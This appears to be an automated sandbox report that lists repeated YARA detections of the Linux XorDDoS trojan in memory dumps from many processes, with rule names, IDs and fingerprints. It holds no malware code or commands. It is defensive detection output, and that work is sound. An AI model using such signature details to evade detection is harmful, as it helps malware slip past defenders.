Source: 5666.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5666.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5729.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5729.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5729.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5672.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5672.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5672.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5606.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5606.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5606.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5458.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5458.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5458.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5612.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5612.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5612.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5553.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5553.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5553.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5538.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5538.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5538.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5731.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5731.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5731.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5716.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5716.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5716.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5657.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5657.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5657.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5592.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5592.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5592.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5734.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5734.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5734.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5660.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5660.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5660.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5643.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5643.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5643.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5663.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5663.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5663.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5568.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5568.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5568.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5548.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5548.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5548.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5473.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5473.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5473.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5763.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5763.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5763.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5573.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5573.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5573.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5582.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5582.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5582.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5737.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5737.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5737.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5551.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
